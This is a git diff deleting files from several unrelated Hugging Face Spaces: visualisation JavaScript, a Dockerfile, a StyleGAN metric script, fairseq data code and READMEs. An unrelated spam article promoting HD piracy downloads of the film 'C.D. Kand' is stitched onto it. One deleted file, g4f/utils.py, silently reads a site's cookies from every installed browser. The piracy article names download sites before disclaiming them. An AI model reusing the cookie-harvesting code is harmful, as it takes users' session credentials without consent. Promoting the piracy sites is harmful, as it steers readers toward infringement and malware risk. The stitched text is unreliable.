          - `) - .st({width: 1100}) - d3.selectAll('.left,.right').st({width: 500, display: 'inline-block', verticalAlign: 'top'}) - - function initBeeswarm(bySentence, sel){ - var c = d3.conventions({ - sel: sel.append('div'), - height: 80, - totalWidth: 400, - margin: {left: 0, top: 18} - }) - - c.x.domain(d3.extent(bySentence.map(d => +d.corrA))).nice() - // c.x.domain([0, 1]) - c.xAxis.ticks(5) - d3.drawAxis(c) - util.ggPlotBg(c) - c.svg.select('.y').remove() - c.svg.selectAll('.tick').st({display: 'block'}) - - var simulation = d3.forceSimulation(bySentence) - .force("x", d3.forceX(d => c.x(d.corrA)).strength(1)) - .force("y", d3.forceY(c.height / 2)) - .force("collide", d3.forceCollide(4)) - .stop() - - for (var i = 0; i < 120; ++i) simulation.tick() - - c.svg.append('text').text('text') - .text('Distribution of Spearman Correlation Coefficients') - .at({dy: -5, fontWeight: 600}) - - c.svg.appendMany('circle.sentence', bySentence) - .translate(d => [d.x, d.y]) - .at({ - r: 3, - fill: 'none', - stroke: '#000' - }) - .on('mouseover', setSentenceAsPair) - } - initBeeswarm(bySentence, d3.select('.beeswarm')) - - - function initList(bySentence, sel){ - // var sentenceSel = sel.st({height: 500, overflowY: 'scroll', cursor: 'default'}) - // .appendMany('div.sentence', _.sortBy(bySentence, d => d.corrA)) - // .on('mouseover', setSentenceAsPair) - // .st({padding: 2, fontSize: 12}) - - // sentenceSel.append('span') - // .text(d => (d3.format('+.2f')(d.corrA)).replace('0.', '.')) - // .st({marginRight: 10, color: '#aaa'}) - - // sentenceSel.append('span') - // .text(d => d.orig.replace('[', '').replace(']', '')) - - var tableSel = sel - .st({height: 470 + 17, overflowY: 'scroll', cursor: 'default', position: 'relative', left: -40}) - .append('table') - .st({fontSize: 12}) - - tableSel.append('tr.header') - .html(` -
          - - `) - - var rowSel = tableSel - .appendMany('tr.sentence', _.sortBy(bySentence, d => d.corrA)) - .on('mouseover', setSentenceAsPair) - .st({padding: 2, fontSize: 12}) - .html(d => ` - - - `) - } - initList(bySentence, d3.select('.list')) - - - - function setSentenceAsPair(s){ - s.e0 = d3.range(python_data.vocab.length).map(d => -Infinity) - s.e1 = d3.range(python_data.vocab.length).map(d => -Infinity) - s.forEach(d => { - s.e0[d.tokenIndex] = d.e0 - s.e1[d.tokenIndex] = d.e1 - }) - - s.label0 = s.s0 - s.label1 = s.s1 - s.vocab = python_data.vocab - s.count = python_settings.count || 150 - s.isDifference = python_settings.isDifference - - var sel = d3.select('.pair').html('').st({width: 400}) - - initPair(s, sel) - - d3.selectAll('.sentence').classed('active', d => d == s) - - d3.selectAll('div.sentence').filter(d => d == s) - .each(function(){ - this.scrollIntoView({ block: 'nearest', inline: 'nearest'}) - }) - } - - setSentenceAsPair(bySentence[0]) - -} - - -window.init() - diff --git a/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile b/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile deleted file mode 100644 index 8fd3b0a4a1776bd3fe714d73e1e3be6107d66272..0000000000000000000000000000000000000000 --- a/spaces/merve/measuring-fairness/server-side/fill-in-the-blank/py/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# Use the official lightweight Python image. -# https://hub.docker.com/_/python -FROM python:3.9-slim - -# Allow statements and log messages to immediately appear in the Knative logs -ENV PYTHONUNBUFFERED True - -# Copy local code to the container image. -ENV APP_HOME /app -WORKDIR $APP_HOME -COPY . ./ - -# Copy requirements.txt to the docker image and install packages -COPY requirements.txt / -RUN pip install -r requirements.txt - -# Download models -ADD https://storage.googleapis.com/uncertainty-over-space/zari-bert-cda/pytorch_model.bin zari-bert-cda/pytorch_model.bin -ADD https://huggingface.co/bert-large-uncased-whole-word-masking/resolve/main/pytorch_model.bin bert-large-uncased-whole-word-masking/pytorch_model.bin - -# Run the web service on container startup. -CMD exec gunicorn --bind :$PORT --workers 1 --threads 1 --timeout 0 main:app diff --git a/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js b/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js deleted file mode 100644 index 51e81b909d66e7a0b45f54b318a0b88a95fdb217..0000000000000000000000000000000000000000 --- a/spaces/merve/measuring-fairness/source/measuring-fairness/mini.js +++ /dev/null @@ -1,205 +0,0 @@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. 
-==============================================================================*/ - - - - - -window.makeMini = function(){ - - var s = 10 - var sScale = ([a, b]) => [s*a, s*b] - - var miniSel = d3.selectAll('.mini').html('').each(addMini).st({overflow: 'visible'}) - - var cColors = { - true: {true: colors.sick, false: lcolors.sick}, - false: {true: colors.well, false: lcolors.well} - } - var rColors = { - true: {true: lcolors.sick, false: llcolors.sick}, - false: {true: lcolors.well, false: llcolors.well} - } - - - function addMini(){ - var miniSel = d3.select(this) - - var type = miniSel.attr('type') - var sex = miniSel.attr('sex') - var isAll = sex == 'all' - - miniSel.st({marginBottom: sex == 'male' ? 30 : 0}) - - var data = students - .filter(d => isAll ? true : sex == 'male' ? d.isMale : !d.isMale) - - var topDatum = {} - var botDatum = {} - - if (type == 'fp'){ - topDatum.opacity = d => d.grade > d.threshold && d.isSick - botDatum.opacity = d => d.isSick - } else { - topDatum.opacity = d => d.grade > d.threshold && d.isSick - botDatum.opacity = d => d.grade > d.threshold - } - - - - var top = -s*nCols/2 + 10 - if (!isAll) top /= 2 - addGrid(miniSel.append('span'), topDatum) - miniSel.append('span.equation').text('÷').st({top, fontWeight: '', fontSize: 20}) - addGrid(miniSel.append('span'), botDatum) - miniSel.append('span.equation').text('=').st({top, fontWeight: '', fontSize: 20}) - - if (!isAll){ - var sexStr = sex == 'male' ? 'children' : 'adults' - - var coStr = `of ${sexStr}
          testing positive
          are sick` - var fpStr = `of ${sexStr}
          who are sick
          test positive` - miniSel.st({position: 'relative'}) - .append('div.axis') - .st({position: 'absolute', right: -9, textAlign: 'center', width: 95, lineHeight: 14, bottom: -15}) - .html(type == 'fp' ? fpStr : coStr) - - } - - var percentSel = miniSel.append('span.equation').st({top, marginLeft: 0}) - - function update(){ - topDatum.update() - botDatum.update() - - var percent = d3.sum(data, topDatum.opacity)/d3.sum(data, botDatum.opacity) - percentSel.text(d3.format('.0%')(percent)) - } - - miniSel.datum({update}) - - - function addGrid(gridSel, datum){ - var {opacity} = datum - - var width = s*nCols - var height = s*nCols*(isAll ? 1 : .5) - var svg = gridSel.append('svg').at({width, height}) - - var callSickSel = svg.append('rect') - .at({width, height, fill: lcolors.sick}) - - var callWellPath = svg.append('path') - .at({width, height, fill: lcolors.well}) - - - var personSel = svg.appendMany('g', data) - .translate(d => sScale(d.pos[isAll ? 'allIJ' : 'sexGroupIJ'])) - - var pad = 0 - // var rectSel = personSel.append('rect') - // .at({ - // height: s - pad, - // width: s - pad, - // // stroke: '#666', - // // strokeWidth: .1, - // }) - - - var circleSel = personSel.append('circle') - .at({r: s/4, cx: s/2 - pad/2, cy: s/2 - pad/2, fill: d => d.isSick ? colors.sick : '#777'}) - - if (!isAll){ - svg.append('path') - .translate([-1, -5]) - .at({stroke: colors.sick, d: 'M 0 0 H ' + (sex == 'male' ? 8 : 4)*s}) - } - - var geodata = {type: 'FeatureCollection'} - geodata.features = data.map(d => { - var [x, y] = sScale(d.pos[isAll ? 'allIJ' : 'sexGroupIJ']) - return { - type: 'Feature', - geometry: { - type: 'Polygon', - coordinates: [ - [[x, y], [x, y + s], [x + s, y + s], [x + s, y], [x, y]] - ] - }, - properties: {d}, - } - }) - - var topology = topojson.topology({boxes: geodata}) - var geowrap = topojson.feature(topology, topology.objects.boxes) - var path = d3.geoPath() - - var hiddenPath = svg.append('path') - .at({stroke: 'none', fill: 'rgba(255,255,255,.6)'}) - .translate(.5, 1) - - var includedPath = svg.append('path') - .at({stroke: '#000', fill: 'none'}) - .translate(.5, 1) - - - circleSel.at({fill: d => d.isSick ? colors.sick : colors.well}) - - datum.update = () => { - // rectSel.at({ - // // fill: d => rColors[d.grade > d.threshold][opacity(d)], - // // strokeWidth: d => opacity(d) ? 1 : .1, - // }) - - // circleSel.at({fill: d => cColors[d.isSick][opacity(d)]}) - - var byType = d3.nestBy(topology.objects.boxes.geometries, d => opacity(d.properties.d)) - - byType.forEach(type => { - var obj = {type: 'GeometryCollection', geometries: type} - var pathStr = path(topojson.mesh(topology, obj, (a, b) => a == b)) - - var pathSel = type.key == 'true' ? 
includedPath : hiddenPath - pathSel.at({d: pathStr}) - }) - - var sickBoxes = topology.objects.boxes.geometries - .filter(d => d.properties.d.grade <= d.properties.d.threshold) - var obj = {type: 'GeometryCollection', geometries: sickBoxes} - var pathStr = path(topojson.mesh(topology, obj, (a, b) => a == b)) - callWellPath.at({d: pathStr}) - } - } - - } - - - - function updateAll(){ - miniSel.each(d => d.update()) - } - - return {updateAll} -} - - - - - - - - - -if (window.init) window.init() diff --git a/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py b/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py deleted file mode 100644 index 6b185c894ba719701baa6ac348e743a003ec5f27..0000000000000000000000000000000000000000 --- a/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py +++ /dev/null @@ -1,104 +0,0 @@ -import argparse - -import torch -from torch.nn import functional as F -import numpy as np -from tqdm import tqdm - -import lpips -from model import Generator - - -def normalize(x): - return x / torch.sqrt(x.pow(2).sum(-1, keepdim=True)) - - -def slerp(a, b, t): - a = normalize(a) - b = normalize(b) - d = (a * b).sum(-1, keepdim=True) - p = t * torch.acos(d) - c = normalize(b - d * a) - d = a * torch.cos(p) + c * torch.sin(p) - - return normalize(d) - - -def lerp(a, b, t): - return a + (b - a) * t - - -if __name__ == '__main__': - device = 'cuda' - - parser = argparse.ArgumentParser() - - parser.add_argument('--space', choices=['z', 'w']) - parser.add_argument('--batch', type=int, default=64) - parser.add_argument('--n_sample', type=int, default=5000) - parser.add_argument('--size', type=int, default=256) - parser.add_argument('--eps', type=float, default=1e-4) - parser.add_argument('--crop', action='store_true') - parser.add_argument('ckpt', metavar='CHECKPOINT') - - args = parser.parse_args() - - latent_dim = 512 - - ckpt = torch.load(args.ckpt) - - g = Generator(args.size, latent_dim, 8).to(device) - g.load_state_dict(ckpt['g_ema']) - g.eval() - - percept = lpips.PerceptualLoss( - model='net-lin', net='vgg', use_gpu=device.startswith('cuda') - ) - - distances = [] - - n_batch = args.n_sample // args.batch - resid = args.n_sample - (n_batch * args.batch) - batch_sizes = [args.batch] * n_batch + [resid] - - with torch.no_grad(): - for batch in tqdm(batch_sizes): - noise = g.make_noise() - - inputs = torch.randn([batch * 2, latent_dim], device=device) - lerp_t = torch.rand(batch, device=device) - - if args.space == 'w': - latent = g.get_latent(inputs) - latent_t0, latent_t1 = latent[::2], latent[1::2] - latent_e0 = lerp(latent_t0, latent_t1, lerp_t[:, None]) - latent_e1 = lerp(latent_t0, latent_t1, lerp_t[:, None] + args.eps) - latent_e = torch.stack([latent_e0, latent_e1], 1).view(*latent.shape) - - image, _ = g([latent_e], input_is_latent=True, noise=noise) - - if args.crop: - c = image.shape[2] // 8 - image = image[:, :, c * 3 : c * 7, c * 2 : c * 6] - - factor = image.shape[2] // 256 - - if factor > 1: - image = F.interpolate( - image, size=(256, 256), mode='bilinear', align_corners=False - ) - - dist = percept(image[::2], image[1::2]).view(image.shape[0] // 2) / ( - args.eps ** 2 - ) - distances.append(dist.to('cpu').numpy()) - - distances = np.concatenate(distances, 0) - - lo = np.percentile(distances, 1, interpolation='lower') - hi = np.percentile(distances, 99, interpolation='higher') - filtered_dist = np.extract( - np.logical_and(lo <= distances, distances <= hi), distances - ) - - print('ppl:', filtered_dist.mean()) 
diff --git a/spaces/mikaelbhai/GPTBhai_text_history/README.md b/spaces/mikaelbhai/GPTBhai_text_history/README.md deleted file mode 100644 index bbf9cf8705327b307c5a1afd22aeaecce044dc71..0000000000000000000000000000000000000000 --- a/spaces/mikaelbhai/GPTBhai_text_history/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: GPTBhai Text History -emoji: 📚 -colorFrom: pink -colorTo: gray -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/mikeee/convbot/tests/__init__.py b/spaces/mikeee/convbot/tests/__init__.py deleted file mode 100644 index 14e8999c92f78a983043250c29724ca6df723da6..0000000000000000000000000000000000000000 --- a/spaces/mikeee/convbot/tests/__init__.py +++ /dev/null @@ -1 +0,0 @@ -"""Init.""" diff --git a/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py b/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py deleted file mode 100644 index a2e9e4cfa63ecdaf116f4dc7028a983ba004f466..0000000000000000000000000000000000000000 --- a/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py +++ /dev/null @@ -1,135 +0,0 @@ -from abc import ABCMeta, abstractmethod -from collections import OrderedDict - -import torch -import torch.distributed as dist -from mmcv.runner import BaseModule - - -def to_cpu(x): - if isinstance(x, torch.Tensor): - return x.detach().cpu() - return x - - -class BaseArchitecture(BaseModule): - """Base class for mogen architecture.""" - - def __init__(self, init_cfg=None): - super(BaseArchitecture, self).__init__(init_cfg) - - def forward_train(self, **kwargs): - pass - - def forward_test(self, **kwargs): - pass - - def _parse_losses(self, losses): - """Parse the raw outputs (losses) of the network. - Args: - losses (dict): Raw output of the network, which usually contain - losses and other necessary information. - Returns: - tuple[Tensor, dict]: (loss, log_vars), loss is the loss tensor \ - which may be a weighted sum of all losses, log_vars contains \ - all the variables to be sent to the logger. - """ - log_vars = OrderedDict() - for loss_name, loss_value in losses.items(): - if isinstance(loss_value, torch.Tensor): - log_vars[loss_name] = loss_value.mean() - elif isinstance(loss_value, list): - log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value) - else: - raise TypeError( - f'{loss_name} is not a tensor or list of tensors') - - loss = sum(_value for _key, _value in log_vars.items() - if 'loss' in _key) - - log_vars['loss'] = loss - for loss_name, loss_value in log_vars.items(): - # reduce loss when distributed training - if dist.is_available() and dist.is_initialized(): - loss_value = loss_value.data.clone() - dist.all_reduce(loss_value.div_(dist.get_world_size())) - log_vars[loss_name] = loss_value.item() - - return loss, log_vars - - def train_step(self, data, optimizer): - """The iteration step during training. - This method defines an iteration step during training, except for the - back propagation and optimizer updating, which are done in an optimizer - hook. Note that in some complicated cases or models, the whole process - including back propagation and optimizer updating is also defined in - this method, such as GAN. - Args: - data (dict): The output of dataloader. - optimizer (:obj:`torch.optim.Optimizer` | dict): The optimizer of - runner is passed to ``train_step()``. This argument is unused - and reserved. 
- Returns: - dict: It should contain at least 3 keys: ``loss``, ``log_vars``, \ - ``num_samples``. - - ``loss`` is a tensor for back propagation, which can be a - weighted sum of multiple losses. - - ``log_vars`` contains all the variables to be sent to the - logger. - - ``num_samples`` indicates the batch size (when the model is - DDP, it means the batch size on each GPU), which is used for - averaging the logs. - """ - losses = self(**data) - loss, log_vars = self._parse_losses(losses) - - outputs = dict( - loss=loss, log_vars=log_vars, num_samples=len(data['motion'])) - - return outputs - - def val_step(self, data, optimizer=None): - """The iteration step during validation. - This method shares the same signature as :func:`train_step`, but used - during val epochs. Note that the evaluation after training epochs is - not implemented with this method, but an evaluation hook. - """ - losses = self(**data) - loss, log_vars = self._parse_losses(losses) - - outputs = dict( - loss=loss, log_vars=log_vars, num_samples=len(data['motion'])) - - return outputs - - def forward(self, **kwargs): - if self.training: - return self.forward_train(**kwargs) - else: - return self.forward_test(**kwargs) - - def split_results(self, results): - B = results['motion'].shape[0] - output = [] - for i in range(B): - batch_output = dict() - batch_output['motion'] = to_cpu(results['motion'][i]) - batch_output['pred_motion'] = to_cpu(results['pred_motion'][i]) - batch_output['motion_length'] = to_cpu(results['motion_length'][i]) - batch_output['motion_mask'] = to_cpu(results['motion_mask'][i]) - if 'pred_motion_length' in results.keys(): - batch_output['pred_motion_length'] = to_cpu(results['pred_motion_length'][i]) - else: - batch_output['pred_motion_length'] = to_cpu(results['motion_length'][i]) - if 'pred_motion_mask' in results: - batch_output['pred_motion_mask'] = to_cpu(results['pred_motion_mask'][i]) - else: - batch_output['pred_motion_mask'] = to_cpu(results['motion_mask'][i]) - if 'motion_metas' in results.keys(): - motion_metas = results['motion_metas'][i] - if 'text' in motion_metas.keys(): - batch_output['text'] = motion_metas['text'] - if 'token' in motion_metas.keys(): - batch_output['token'] = motion_metas['token'] - output.append(batch_output) - return output diff --git a/spaces/miruchigawa/hakurei-waifu-diffusion/README.md b/spaces/miruchigawa/hakurei-waifu-diffusion/README.md deleted file mode 100644 index e95b5c21dcfafad95141e11a03d871ed96fc378b..0000000000000000000000000000000000000000 --- a/spaces/miruchigawa/hakurei-waifu-diffusion/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Hakurei Waifu Diffusion -emoji: 🦀 -colorFrom: indigo -colorTo: gray -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/monra/freegpt-webui-chimera/g4f/utils.py b/spaces/monra/freegpt-webui-chimera/g4f/utils.py deleted file mode 100644 index d5ab41c79b44ab81e1843d209cb342bd83dafb42..0000000000000000000000000000000000000000 --- a/spaces/monra/freegpt-webui-chimera/g4f/utils.py +++ /dev/null @@ -1,49 +0,0 @@ -import browser_cookie3 - - -class Utils: - browsers = [ - browser_cookie3.chrome, # 62.74% market share - browser_cookie3.safari, # 24.12% market share - browser_cookie3.firefox, # 4.56% market share - browser_cookie3.edge, # 2.85% market share - browser_cookie3.opera, # 1.69% market share - browser_cookie3.brave, # 0.96% market share - browser_cookie3.opera_gx, # 0.64% 
market share - browser_cookie3.vivaldi, # 0.32% market share - ] - - def get_cookies(domain: str, setName: str = None, setBrowser: str = False) -> dict: - cookies = {} - - if setBrowser != False: - for browser in Utils.browsers: - if browser.__name__ == setBrowser: - try: - for c in browser(domain_name=domain): - if c.name not in cookies: - cookies = cookies | {c.name: c.value} - - except Exception as e: - pass - - else: - for browser in Utils.browsers: - try: - for c in browser(domain_name=domain): - if c.name not in cookies: - cookies = cookies | {c.name: c.value} - - except Exception as e: - pass - - if setName: - try: - return {setName: cookies[setName]} - - except ValueError: - print(f'Error: could not find {setName} cookie in any browser.') - exit(1) - - else: - return cookies diff --git a/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md b/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md deleted file mode 100644 index 5546ba5a357cbeed205ad99d6c4a41201b4a15d5..0000000000000000000000000000000000000000 --- a/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Bark Voice Cloning -emoji: 🎶 -colorFrom: yellow -colorTo: pink -sdk: gradio -sdk_version: 3.34.0 -app_file: app.py -pinned: false -license: mit -duplicated_from: kevinwang676/Bark-Voice-Cloning ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh b/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh deleted file mode 100644 index 013f7a9b055a7693a29f9c5ba1e4003a9a25850e..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env zsh -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -source_dir=$1 -tgt_dir=$2 -model=$3 - -if [ -z "$4" ] - then - dim=512 - else - dim=$4 -fi - -echo "using $dim dim for PCA" - -if [ -z "$5" ] - then - layer=14 - else - layer=$5 -fi - -echo "extracting from layer $layer" - -train_split=train -valid_split=valid -test_split=test - -all_splits=($train_split) - -if [[ -f "$source_dir/valid.tsv" ]]; then - all_splits+=('valid') -fi - -if [[ -f "$source_dir/test.tsv" ]]; then - all_splits+=('test') -fi - -echo "processing splits: $all_splits" - -mkdir -p $tgt_dir - -cp $source_dir/*.tsv $tgt_dir -cp $source_dir/*.wrd $tgt_dir -cp $source_dir/*.ltr $tgt_dir -cp $source_dir/*.phn $tgt_dir -cp $source_dir/dict* $tgt_dir - -setopt shwordsplit - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_extract_features.py $source_dir --split $split \ - --save-dir $tgt_dir --checkpoint $model --layer $layer -done - -python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_cluster_faiss.py $tgt_dir/${train_split}.tsv \ ---checkpoint $model --save-dir $tgt_dir -f "CLUS128" --sample-pct 1.0 - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_apply_cluster_faiss.py $tgt_dir \ - --checkpoint $model --path $tgt_dir/CLUS128 --split $split -done - -python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/pca.py $tgt_dir/${train_split}.npy --output $tgt_dir/pca --dim $dim - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/apply_pca.py $tgt_dir --split $split --save-dir $tgt_dir/precompute_pca$dim --pca-path $tgt_dir/pca/${dim}_pca --batch-size 1048000 - - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/merge_clusters.py $tgt_dir/precompute_pca$dim --cluster-dir $tgt_dir/CLUS128 \ - --split $split --save-dir $tgt_dir/precompute_pca${dim}_cls128_mean --pooling mean - - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/mean_pool.py $tgt_dir/precompute_pca${dim}_cls128_mean \ - --save-dir $tgt_dir/precompute_pca${dim}_cls128_mean_pooled --split $split -done diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py deleted file mode 100644 index d2c65fd7e058072911c3aa60bfc760288a0f83e5..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py +++ /dev/null @@ -1,202 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import numpy as np -import torch -from fairseq.data import FairseqDataset, plasma_utils -from fairseq.data.indexed_dataset import best_fitting_int_dtype -from typing import Tuple - - -class TokenBlockDataset(FairseqDataset): - """Break a Dataset of tokens into blocks. - - Args: - dataset (~torch.utils.data.Dataset): dataset to break into blocks - sizes (List[int]): sentence lengths (required for 'complete' and 'eos') - block_size (int): maximum block size (ignored in 'eos' break mode) - break_mode (str, optional): Mode used for breaking tokens. 
Values can - be one of: - - 'none': break tokens into equally sized blocks (up to block_size) - - 'complete': break tokens into blocks (up to block_size) such that - blocks contains complete sentences, although block_size may be - exceeded if some sentences exceed block_size - - 'complete_doc': similar to 'complete' mode, but do not - cross document boundaries - - 'eos': each block contains one sentence (block_size is ignored) - include_targets (bool, optional): return next tokens as targets - (default: False). - document_sep_len (int, optional): document separator size (required for - 'complete_doc' break mode). Typically 1 if the sentences have eos - and 0 otherwise. - """ - - def __init__( - self, - dataset, - sizes, - block_size, - pad, - eos, - break_mode=None, - include_targets=False, - document_sep_len=1, - use_plasma_view=False, - split_path=None, - plasma_path=None, - ): - - super().__init__() - self.dataset = dataset - self.pad = pad - self.eos = eos - self.include_targets = include_targets - - assert len(dataset) > 0 - - assert len(dataset) == len(sizes) - _sizes, block_to_dataset_index, slice_indices = self._build_slice_indices( - sizes, break_mode, document_sep_len, block_size - ) - if use_plasma_view: - plasma_id = (block_size, document_sep_len, str(break_mode), len(dataset)) - self._slice_indices = plasma_utils.PlasmaView( - slice_indices, split_path, (plasma_id, 0), plasma_path=plasma_path - ) - self._sizes = plasma_utils.PlasmaView( - _sizes, split_path, (plasma_id, 1), plasma_path=plasma_path - ) - self._block_to_dataset_index = plasma_utils.PlasmaView( - block_to_dataset_index, split_path, (plasma_id, 2), plasma_path=plasma_path, - ) - else: - self._slice_indices = plasma_utils.PlasmaArray(slice_indices) - self._sizes = plasma_utils.PlasmaArray(_sizes) - self._block_to_dataset_index = plasma_utils.PlasmaArray( - block_to_dataset_index - ) - - @staticmethod - def _build_slice_indices( - sizes, break_mode, document_sep_len, block_size - ) -> Tuple[np.ndarray]: - """Use token_block_utils_fast to build arrays for indexing into self.dataset""" - try: - from fairseq.data.token_block_utils_fast import ( - _get_slice_indices_fast, - _get_block_to_dataset_index_fast, - ) - except ImportError: - raise ImportError( - "Please build Cython components with: `pip install --editable .` " - "or `python setup.py build_ext --inplace`" - ) - - if isinstance(sizes, list): - sizes = np.array(sizes, dtype=np.int64) - else: - if torch.is_tensor(sizes): - sizes = sizes.numpy() - sizes = sizes.astype(np.int64) - - break_mode = break_mode if break_mode is not None else "none" - - # For "eos" break-mode, block_size is not required parameters. 
- if break_mode == "eos" and block_size is None: - block_size = 0 - - slice_indices = _get_slice_indices_fast( - sizes, str(break_mode), block_size, document_sep_len - ) - _sizes = slice_indices[:, 1] - slice_indices[:, 0] - - # build index mapping block indices to the underlying dataset indices - if break_mode == "eos": - # much faster version for eos break mode - block_to_dataset_index = np.stack( - [ - np.arange(len(sizes)), # starting index in dataset - np.zeros( - len(sizes), dtype=np.compat.long - ), # starting offset within starting index - np.arange(len(sizes)), # ending index in dataset - ], - 1, - ) - else: - block_to_dataset_index = _get_block_to_dataset_index_fast( - sizes, slice_indices, - ) - size_dtype = np.uint16 if block_size < 65535 else np.uint32 - num_tokens = slice_indices[-1].max() - slice_indices_dtype = best_fitting_int_dtype(num_tokens) - slice_indices = slice_indices.astype(slice_indices_dtype) - _sizes = _sizes.astype(size_dtype) - block_to_dataset_index = block_to_dataset_index.astype(slice_indices_dtype) - return _sizes, block_to_dataset_index, slice_indices - - @property - def slice_indices(self): - return self._slice_indices.array - - @property - def sizes(self): - return self._sizes.array - - @property - def block_to_dataset_index(self): - return self._block_to_dataset_index.array - - def attr(self, attr: str, index: int): - start_ds_idx, _, _ = self.block_to_dataset_index[index] - return self.dataset.attr(attr, start_ds_idx) - - def __getitem__(self, index): - start_ds_idx, start_offset, end_ds_idx = self.block_to_dataset_index[index] - - buffer = torch.cat( - [self.dataset[idx] for idx in range(start_ds_idx, end_ds_idx + 1)] - ) - slice_s, slice_e = self.slice_indices[index] - length = slice_e - slice_s - s, e = start_offset, start_offset + length - item = buffer[s:e] - - if self.include_targets: - # *target* is the original sentence (=item) - # *source* is shifted right by 1 (maybe left-padded with eos) - # *past_target* is shifted right by 2 (left-padded as needed) - if s == 0: - source = torch.cat([item.new([self.eos]), buffer[0 : e - 1]]) - past_target = torch.cat( - [item.new([self.pad, self.eos]), buffer[0 : e - 2]] - ) - else: - source = buffer[s - 1 : e - 1] - if s == 1: - past_target = torch.cat([item.new([self.eos]), buffer[0 : e - 2]]) - else: - past_target = buffer[s - 2 : e - 2] - - return source, item, past_target - - return item - - def __len__(self): - return len(self.slice_indices) - - @property - def supports_prefetch(self): - return getattr(self.dataset, "supports_prefetch", False) - - def prefetch(self, indices): - self.dataset.prefetch( - { - ds_idx - for index in indices - for start_ds_idx, _, end_ds_idx in [self.block_to_dataset_index[index]] - for ds_idx in range(start_ds_idx, end_ds_idx + 1) - } - ) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md deleted file mode 100644 index 819bc454026aa65d99fe12c8824631124de12595..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md +++ /dev/null @@ -1,17 +0,0 @@ - -

          C.D. Kand: A Bollywood Horror Movie You Can Watch Online

          -

          C.D. Kand is a 2014 Hindi horror movie directed by Imtiaz Patel and starring Anuya Bhagvath, Anara Gupta, Samarth Chaturvedi and others. The movie tells the story of a woman named Gauri Devi, who is sexually exploited and killed by politicians, and comes back as a ghost to take revenge with the help of a reporter named Mansi Rana.

          -

          If you are looking for a way to watch C.D. Kand online, you can find some websites that offer the movie in HD 720p quality. However, be careful of the legal and ethical issues involved in downloading or streaming pirated content. You may also face malware or virus threats from some of these websites.

          -

C.D. Kand Movie Download HD 720p


          Download ✒ ✒ ✒ https://urlcod.com/2uIc4s



          -

One of the websites that claim to offer a C.D. Kand movie download in HD 720p is HDHub4u[^4^], which also hosts other Bollywood and Hollywood movies and web series in Hindi and English. Another website that claims to have the movie is Peatix[^5^], which also provides a download link. You can also find some links to the movie on SoundCloud[^6^] [^7^], where some users have uploaded it.

          -

However, we do not recommend or endorse any of these websites, as they may violate copyright law and harm the original creators of the movie. We suggest you watch C.D. Kand legally on YouTube[^2^], where it has been made available for free by Shemaroo Movies, a reputed entertainment company.

          -

